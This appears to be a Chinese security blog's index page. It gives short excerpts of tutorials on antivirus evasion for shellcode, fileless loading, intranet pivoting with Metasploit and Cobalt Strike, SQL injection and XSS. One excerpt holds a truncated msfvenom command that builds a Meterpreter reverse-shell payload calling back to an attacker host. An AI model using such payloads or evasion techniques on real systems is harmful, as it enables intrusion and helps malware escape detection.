网络安全
未读
免杀对抗-ShellCode上线+回调编译执行+混淆变异算法
C/C++ --ShellCode-免杀对抗 介绍: shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。我们经常在CS里面生成指定编程语言的payload,而这个payload里面就是一段十六进制的机器码。
网络安全
未读
免杀对抗-C+go语言-混淆+防反编译+分离
C#&NET-ShellCode-生成/上线 一、生成: 1.msf生成C#语言的shellcode 命令:msfvenom-p windows/x64/meterpreter/reverse_tcp LHOST=192.168.206.192 LPORT=4444 -e x86/shikata_g
CTF
未读
Python3 图片隐写术的实现
前言 原本的实现程序只能处理 png 格式的图片,笔者考虑添加对 jpg 格式的支持;经过一段时间的尝试,最后发现因为此方案是基于 Pillow 模块实现对图片文件的处理,而 Pillow 模块在保存 jpg 格式图片时默认会将色彩信息的最后一位去除,为有损压缩,故加密信息会在最后的保存步骤中被抹去
网络安全
未读
免杀对抗-无文件落地和分离拆分-文本提取+加载器分离+参数协议化+图片隐写
无文件落地&分离拆分 无文件落地&分离拆分其实就是内存免杀,内存免杀是将shellcode直接加载进内存,由于没有文件落地,因此可以绕过文件扫描策略的查杀。为了使内存免杀的效果更好,在申请内存时一般采用渐进式申请一块可读写内存,在运行时改为可执行,在执行的时候遵循分离免杀的思想。分离免杀包含对特征和
网络安全
未读
内网渗透-代理Socks协议+路由不出网+后渗透通讯+CS-MSF控制上线
网络通讯-MSF&CS-路由添加&节点建立 前提:已获取目标的一台主机权限 目的:渗透并获取该内网中其他主机的权限。 但是发现目标内网其他主机没有网络,怎么办? 方法一:将渗透测试工具上传到已经获取权限的内网主机(太麻烦) 方法二:添加路由,建立节点(方便)
网络安全
未读
内网渗透-域防火墙+入站出站规则+组策略对象同步+不出网隧道上线
单机-防火墙-限制端口出入站-熟悉常见主机配置不出网的方式 配置防火墙属性 1.win10虚拟机本地搭建一个网站,配置防火墙属性的入站连接为默认值。
网络安全
未读
抓包-小程序+APP+PC应用+封包
Cherles抓取微信小程序数据包 Burpsuite抓取微信小程序数据包——配合Proxifier工具 配置Proxifier工具的代理服务器 配置Proxifier工具的
漏洞
未读
SQL注入-位置+post注入+sqlmap
数据请求方式-GET&POST&COOKIE等 ——url没有参数并不代表没有注入,有时会在数据包中,http数据包中每个部分只要可以被接收,都可能产生漏洞 get参数传递位置
xss漏洞-反射+存储+DOM
XSS跨站-反射型&存储型&DOM型等 产生原理: 服务器没有对用户提交的数据做过滤或者过滤不严谨,直接回显到了用户浏览器,浏览器对其进行了js解析并执行,导致了xss漏洞。 攻击原理: 攻击者利用网站程序对用户输入过滤